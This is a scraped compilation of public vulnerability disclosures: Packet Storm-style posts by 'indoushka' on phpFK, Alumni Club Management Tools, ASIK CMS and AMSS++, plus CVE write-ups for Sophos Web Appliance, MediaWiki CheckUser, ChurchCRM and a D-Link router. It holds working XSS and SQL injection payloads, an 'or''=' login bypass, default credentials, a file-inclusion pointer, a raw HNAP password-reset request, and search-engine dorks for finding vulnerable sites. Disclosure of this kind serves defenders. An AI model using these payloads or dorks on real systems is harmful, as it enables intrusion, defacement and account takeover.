phpFK version 9.2 Beta suffers from cross site scripting and remote SQL injection vulnerabilities.

**phpFK 9.2 Beta Cross Site Scripting / SQL Injection**

**phpFK 9.2 Beta Cross Site Scripting / SQL Injection**

Posted Jul 2, 2023

Authored by indoushka

phpFK version 9.2 Beta suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection

SHA-256 | 09fef1efe957f866ce2e4d01724c95e85523e37eb341c2135635c17435c8b42c

Download | Favorite | View

**phpFK 9.2 Beta Cross Site Scripting / SQL Injection**

    ====================================================================================================================================| # Title     : phpFK v9.2 Beta version SQLi + XSS Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0.(32-bit)                                              | | # Vendor    : https://www.frank-karau.de/demo-forum/                                                                             |  | # Dork      : Powered by: phpFK                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,554)
*   Arbitrary (16,117)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,328)
*   DoS (23,288)
*   Encryption (2,363)
*   Exploit (51,405)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,627)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,787)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,065)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,707)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

phpFK 9.2 Beta Cross Site Scripting / SQL Injection

Alumni Club Management Tools version 2.2.7 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Alumni Club Management Tools v 2.2.7 XSS Vulnerability                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             | | # Vendor    : http://alumnimagnet.com                                                                                            |  | # Dork      : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /events.html?daily_detail&date=27-3-2019'"()%26%25<acx><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/edu/events.html?daily_detail&date=27-3-2019%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Alumni Club Management Tools 2.2.7 Cross Site Scripting

Alumni Club Management Tools version 2.2.7 suffers from file upload and remote SQL injection vulnerabilities.

    ====================================================================================================================================| # Title     : Alumni Club Management Tools v 2.2.7 Unrestricted File Upload Vulnerability                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             | | # Vendor    : http://alumnimagnet.com                                                                                            |  | # Dork      : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] suffers from remote sql injection as well From within the control panel, malicious files can be uploaded .[+] Use Payload : user : 'or''='@gmail.com pass : 'or''=' to login .[+] Go to https://127.0.0.1/edu/admin_files.html?sub_op=upload_files[+] find your files https://127.0.0.1/edu/admin_files.html====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload

Aplikasi Sistem Informasi Kelulusan CMS version 1.0.9 suffers from a remote file inclusion vulnerability.

    ====================================================================================================================================| # Title     : Aplikasi Sistem Informasi Kelulusan CMS v 1.0.9 [ASIK] RCE Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://lulus.smkn2purwokerto.sch.id/admin.zip                                                                      |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] the infected File :      <?php      require "config.php";       error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));       $page=$_GET['page'];       $filename="content/$page.php";       if (!file_exists($filename))        {         include "content/home.php";        }            else        {@include "content/$page.php";}        ?>[+] RCE : /index.php?page= [Ev!l]====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Aplikasi Sistem Informasi Kelulusan CMS 1.0.9 Remote File Inclusion

Reflected cross site scripting (XSS) vulnerability was discovered in Sophos Web Appliance v4.3.9.1 that allows for arbitrary code to be inputted via the double quotes.

Vendor: Sophos

Product: Sophos Web Appliance

Version affected: 4.1.1-0.9

This worked also on the latest v4.3.9.1 version (as of 05 Jan 2020) I used Firefox Browser, 71.1(64-bit) on Windows 10.

**Product description:**

The Sophos Web Appliance is designed to function as a web proxy that provides HTTP security at. the gateway. Potentially risky content is scanned for various forms of malware.

“Sophos Web Appliance (SWA) and Sophos Management Appliance (SMA) will reach End of Life (EOL) on 20 July 2023. When this happens, the products will continue to pass traffic but will no longer receive security or software updates. Cloud services with functions such as support services and LiveConnect will be turned off.”

*   CVE ID: CVE-2023-33336
*   CWE ID: CWE-79

**Proof of Concept:**

Reflected cross-site scripting (XSS) vulnerability was discovered in the product.

It was possible to inject malicious code and input was successfully reflected between doubles quotes. It’s a systemic XSS, which definitely increases risk compared to standard XSS.

Vulnerable input section was possible to set to: status reports configuration

The following Proof of Concept (PoC) demonstrates the attack as well as displaying evidence of the script payload being returned in the response.

    Sample GET request:
    https://10.0.0.17/index.php?c=trend_suspect&period=0&section=reports" onmouseover%3dprompt(1) bad%3d"&STYLE=34f6ad4ed0b9f19a094041a234feb5e3

Authenticated reflected XSS with the privileges of admin user. Sophos Virtual Web Appliance used to demonstrate the vulnerability was the latest available from Sophos trials website.

**References:**

1.  https://www.owasp.org/index.php/Cross-site\_Scripting\_(XSS)
2.  https://support.sophos.com/support/s/article/KB-000039441?language=en\_US
3.  https://docs.sophos.com/nsg/swa/help/en-us/nsg/swa/concepts/AboutYourAppliance.html

CVE-2023-33336: Cross-site scripting (XSS) in Sophos Web Appliance - 4.1.1-0.9

An issue was discovered in the CheckUser extension for MediaWiki through 1.39.3. In Special:CheckUser, a check of the "get edits" type is vulnerable to HTML injection through the User-Agent HTTP request header.

**

Special:CheckUser 'get edits' is vulnerable to HTML injection through user agent string

Closed, ResolvedPublicSecurity



**

*   Edit Task
*   Edit Related Tasks...
*   Edit Related Objects...

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

**Steps to reproduce**

*   Modify your user agent to include HTML
*   Make a test edit or logged action
*   Load Special:CheckUser
*   Run a check using the 'get edits' type
*   Notice that the HTML isn't escaped

**Example**  
Override your user agent string (example using Firefox about:config):  

Inspecting the logged edit using inspect element:

**Other information**  
The user agent is truncated before insertion into the database at 255 bytes which could make it harder to abuse. Only occurs when running the 'get edits' check type.

Risk Rating

Medium

Author Affiliation

Wikimedia Communities

*   Mentions

**Event Timeline**

Dreamy\_Jazz renamed this task from Special:CheckUser vulnerable to HTML injection through user agent string to Special:CheckUser 'get edits' is vulnerable to HTML injection through user agent string.Mar 30 2023, 2:44 PM

Comment Actions

> Please add a SECURITY: prefix to the commit message.

Done. Updated patch provided below:  

Comment Actions

Added prefix, will deploy now. I was able to reproduce the issue and test the fix locally.

0001-SECURITY-Escape-user-agent-before-showing-in-Special.patch1 KBDownload

Comment Actions

@Reedy I wonder if we can include this in the security release that you pre-announced yesterday? Or is this too short notice? (Security deployment is currently ongoing, btw.)

Comment Actions

This fix needs backporting to 1.39 and 1.40. 1.38 and before doesn't seem to have this problem.

Comment Actions

> This fix needs backporting to 1.39 and 1.40. 1.38 and before doesn't seem to have this problem.

Agreed, I just checked the same thing. (The bug was introduced in 6d6b229c02, the old code was using htmlspecialchars( $row->cuc\_agent ) and thus safe.)

Comment Actions

The fix should be deployed on wmf.1 and wmf.2 now. (I used deploy\_security.py.)

Comment Actions

Can verify this deployed correctly.

Was able to verify without the need to spoof my user agent to include HTML as there is separate bug with the template parser that makes the user agent not display if there is a specific character (which is how I found this issue) when the value is escaped. That issue is rare (only seen it once) and isn't a security issue. Will be looking for the associated task and if not filing one.

Comment Actions

Thanks all for the quick patch and deploy.

> @Reedy I wonder if we can include this in the security release that you pre-announced yesterday? Or is this too short notice? (Security deployment is currently ongoing, btw.)

Since CheckUser isn't bundled with core, it would go out as part of a supplemental security releases (current tracking bug: T325849). I don't know if I'd agree there's any sense of urgency here - anything within the supplemental release can be made public and have backports performed once the issue has been patched in Wikimedia production. So this issue could be a part of the _next_ supplemental security release, but be disclosed and backported much sooner.

Comment Actions

> So this issue could be a part of the _next_ supplemental security release, but be disclosed and backported much sooner.

Considering that users of the release branches will be pulling the changes soon, getting this merged into the release branches before the git pull is run makes sense to me. Therefore, given that this seems to be an okay thing once it's fixed in WMF production (which it has been), I'll do as such now.

A useful side effect of getting this fix out is that it makes fixing a non-security bug easier as this method of escaping seems to prevent some unicode characters being displayed (see T333573). The temporary fix (unless I can find the core issue) would be to use htmlspecialchars to escape the value. This method would conflict with the currently deployed security patch.

Comment Actions

> Considering that users of the release branches will be pulling the changes soon, getting this merged into the release branches before the git pull is run makes sense to me. Therefore, given that this seems to be an okay thing once it's fixed in WMF production (which it has been), I'll do as such now.

That's fine - I've got it tracked for the _next_ supplemental release: T333626. Completely fine to open this up and do backports now.

sbassett changed the task status from Open to In Progress.Apr 4 2023, 8:05 PM

sbassett triaged this task as Medium priority.

sbassett changed Author Affiliation from N/A to Wikimedia Communities.

sbassett changed the visibility from "Custom Policy" to "Public (No Login Required)".

sbassett changed Risk Rating from N/A to Medium.

Comment Actions

Unsure what else might need to be done before this can be marked as resolved (i.e. removing the patch on WMF systems), but the fix has been merged and backported to all supported versions that were vulnerable.

Comment Actions

> Unsure what else might need to be done before this can be marked as resolved (i.e. removing the patch on WMF systems), but the fix has been merged and backported to all supported versions that were vulnerable.

We track Wikimedia production patches on another task and Release Engineering has a step in the train that detects when such patches should fall off. So I think this can be resolved for now.

Content licensed under Creative Commons Attribution-ShareAlike 4.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

CVE-2023-37255: ⚓ T333569 Special:CheckUser 'get edits' is vulnerable to HTML injection through user agent string

Multiple cross-site scripting (XSS) vulnerabilities were discovered in Church CRM v4.5.3 in GroupReports.php via GroupRole, ReportModel, and OnlyCart parameters.

**If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**

**On what page in the application did you find this issue?**

/churchcrm/GroupReports.php

**On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?**

Linux

**What browser (and version) are you running?**

Firefox

**What version of PHP is the server running?**

7.4.33

**What version of SQL Server are you running?**

5.7.26

**What version of ChurchCRM are you running?**

4.5.3

Description:  
XSS was detected in GroupReports.php, three hidden parameters were found in the code of this page, in which this vulnerability is possible: GroupRole, ReportModel, OnlyCart. A browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.

Impact:  
The vulnerability allows an attacker to send malicious JavaScript code which could result in hijacking of the user's cookie/session tokens , redirecting the user to a malicious webpage, downloading malicious files hosted on attackers server and performing many other unintended browser actions

Proof of Concept:  
**<script>alert('XSS')</script>**

CVE-2023-33661: XSS exists in the group report page · Issue #6474 · ChurchCRM/CRM

AMSS++ version 2,0 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : AMSS++ v 2.0 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar                                             |  | # Dork      : แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++"                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Login : User = admin &  pass = 1234[+] http://127.0.0.1/pmss/index.php====Greetings to :=======================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh    |=========================================================================================================================================

AMSS++ 2.0 Insecure Settings

D-Link DIR-823G firmware version 1.02B05 has a password reset vulnerability, which originates from the SetMultipleActions API, allowing unauthorized attackers to reset the WEB page management password.

**DIR823G\_V1.0.2B05\_20181207.bin Reset password vulnerability****Overview**

*   Manufacturer's address：http://www.dlink.com.cn/
*   Firmware download address ： http://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DIR-823G
*   CVE：CVE-2023-26615

**Affected version**

Below is the latest firmware

**Vulnerability details**

SetMultipleActions handler function will traverse the function list, and then query whether there is a matching function in the incoming data. When SetPasswdSettings exists, the SetPasswdSettings handler will be executed.

SetPasswdSettings handler function 35 lines of code try to process the incoming password, if the processing fails, execute 53 lines of code to set the password to empty.

**Vulnerability verify**

**POC**

    POST /HNAP1/ HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://purenetworks.com/HNAP1/SetMultipleActions"
    HNAP_AUTH: 8D2D80BB8F1D63D9FF6E08DE6B821073 1675516820
    X-Requested-With: XMLHttpRequest
    Content-Length: 550
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/SNTP.html
    Cookie: uid=GcfQ7q3TwY; PrivateKey=455D512F7EA7AA45CC1B4CBB4562DE49; timeout=106
    
    <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetMultipleActions xmlns="http://purenetworks.com/HNAP1/"><SetPasswdSettings xmlns="http://purenetworks.com/HNAP1/"><NewPassword>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</NewPassword></SetPasswdSettings></SetMultipleActions></soap:Body></soap:Envelope>

CVE-2023-26615: VulIoT/D-Link/DIR823G V1.0.2B05/HNAP1/SetMultipleActions at main · 726232111/VulIoT

Alumni Club Management Tools version 2.2.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Alumni Club Management Tools v 2.2.7 auth by pass Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             | | # Vendor    : http://alumnimagnet.com                                                                                            |  | # Dork      : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload  user : 'or''='@gmail.com pass : 'or''='[+] https://127.0.0.1/edu/admin.html====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Tag

#firefox